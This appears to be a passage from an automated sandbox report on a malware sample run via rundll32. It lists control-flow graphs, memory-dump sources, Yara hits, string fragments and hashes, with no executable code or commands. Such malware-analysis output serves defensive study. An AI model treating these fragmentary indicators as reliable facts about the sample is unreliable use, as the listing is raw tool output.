2077eeb0900-2077eeb0905 123->142 124->123 125->124 125->125 133 2077eeb07e3-2077eeb07f0 126->133 134 2077eeb07db-2077eeb07e1 126->134 135 2077eeb0844-2077eeb0850 127->135 136 2077eeb083b 127->136 128->108 129->122 130->76 131->130 139 2077eeb07f2-2077eeb07f9 133->139 140 2077eeb07fb-2077eeb080d 133->140 138 2077eeb0812-2077eeb082c 134->138 135->105 141 2077eeb0856-2077eeb0857 135->141 136->135 138->127 144 2077eeb082e-2077eeb0833 138->144 139->139 139->140 140->138 141->91 142->95 144->126
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.265037297.000002077EEB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002077EEB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_2077eeb0000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 742c680dd81b64162de564ca7a7ae1e17045e6f491bd025cac1019762906f048
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 0D72D830918B48CBE769DF18C889BB9B7E1FB99304F10462DE8CAC7251DB74E541CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 285 18000cfb4-18000d00a call 1800194a4 257->285 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 268 18000cd35-18000cdce call 18000703c call 18001c32c 262->268 269 18000ccab-18000ccb0 262->269 263->253 271 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->271 272 18000c659-18000c65e 264->272 305 18000cdd3-18000ce2e call 1800194a4 268->305 279 18000ccb6-18000cd30 call 180021434 269->279 280 18000d00f-18000d014 269->280 308 18000ca57-18000caa0 call 1800194a4 271->308 282 18000c664-18000c669 272->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 272->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 285->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 305->253 308->253 316->253 325->253 326->253
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
